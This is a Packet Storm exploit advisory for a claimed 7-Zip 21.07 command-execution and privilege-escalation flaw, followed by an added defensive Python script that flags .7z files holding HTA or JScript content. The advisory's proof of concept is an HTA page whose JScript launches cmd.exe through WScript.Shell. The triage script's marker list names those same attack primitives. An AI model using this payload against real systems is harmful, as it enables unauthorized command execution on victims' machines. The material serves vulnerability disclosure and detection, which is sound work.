packetstorm | Kagan Capar | PACKETSTORM:166763
Apr 19, 2022 - 12:00 a.m.

7-Zip 21.07 Code Execution / Privilege Escalation

`# Exploit Title: 7-zip - Code Execution / Local Privilege Escalation  
# Exploit Author: Kagan Capar  
# Date: 2020-04-12  
# Vendor homepage: https://www.7-zip.org/  
# Software link: https://www.7-zip.org/a/7z2107-x64.msi  
# Version: 21.07 and all versions  
# Tested On: Windows 10 Pro (x64)  
# References: https://github.com/kagancapar/CVE-2022-29072  
  
# About:  
7-Zip through 21.07 on Windows allows privilege escalation and command execution when a file with the .7z extension is dragged to the Help>Contents area.  
  
# Proof of Concept:  
<html>  
<head>  
<HTA:APPLICATION ID="7zipcodeexec">  
<script language="jscript">  
var c = "cmd.exe";  
new ActiveXObject('WScript.Shell').Run(c);  
</script>  
</head>  
</html>  
  
`
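A defensive triage check for the pattern this advisory describes, where a file carrying the .7z extension holds HTML/JScript instead of an archive. This is an added example, not code from the advisory or its author; the `triage` function, the marker list and the sample inputs are assumptions constructed here.

```python
import re

# Signature that every real 7z archive starts with: '7' 'z' BC AF 27 1C.
SEVENZ_MAGIC = b"7z\xbc\xaf\x27\x1c"
SCAN_LIMIT = 1 << 20  # only inspect the first 1 MiB of a mismatched file

# Markers drawn from the proof of concept on this page (assumed list, extend as needed).
MARKERS = {
    "hta_application": re.compile(rb"<\s*hta:application", re.I),
    "script_block": re.compile(rb"<\s*script\b", re.I),
    "activex_object": re.compile(rb"ActiveXObject", re.I),
    "wscript_shell": re.compile(rb"WScript\.Shell", re.I),
}


def triage(name: str, data: bytes) -> dict:
    """Classify a file as skip / archive / mismatch / suspicious."""
    if not name.lower().endswith(".7z"):
        return {"verdict": "skip", "markers": []}
    if data.startswith(SEVENZ_MAGIC):
        # Genuine archive header; contents are not inspected further here.
        return {"verdict": "archive", "markers": []}
    # Drop NUL bytes so UTF-16 encoded markup matches the ASCII patterns.
    flat = data[:SCAN_LIMIT].replace(b"\x00", b"")
    hits = sorted(k for k, rx in MARKERS.items() if rx.search(flat))
    return {"verdict": "suspicious" if hits else "mismatch", "markers": hits}


# Constructed sample inputs (not captured from a real system).
SAMPLE_ARCHIVE = SEVENZ_MAGIC + b"\x00\x04" + bytes(24)
SAMPLE_SCRIPT = (
    b'<html><head><HTA:APPLICATION ID="demo">'
    b"<script language=\"jscript\">new ActiveXObject('WScript.Shell');</script>"
    b"</head></html>"
)
SAMPLE_UTF16 = SAMPLE_SCRIPT.decode("ascii").encode("utf-16")
SAMPLE_TEXT = b"meeting notes, renamed by mistake\n"

if __name__ == "__main__":
    for fname, blob in [
        ("backup.7z", SAMPLE_ARCHIVE),
        ("help.7z", SAMPLE_SCRIPT),
        ("help16.7z", SAMPLE_UTF16),
        ("notes.7z", SAMPLE_TEXT),
        ("page.html", SAMPLE_SCRIPT),
    ]:
        print(fname, triage(fname, blob))
```

A `mismatch` verdict (wrong signature, no script markers) is still worth a look in mail or download filtering, since the extension does not match the content.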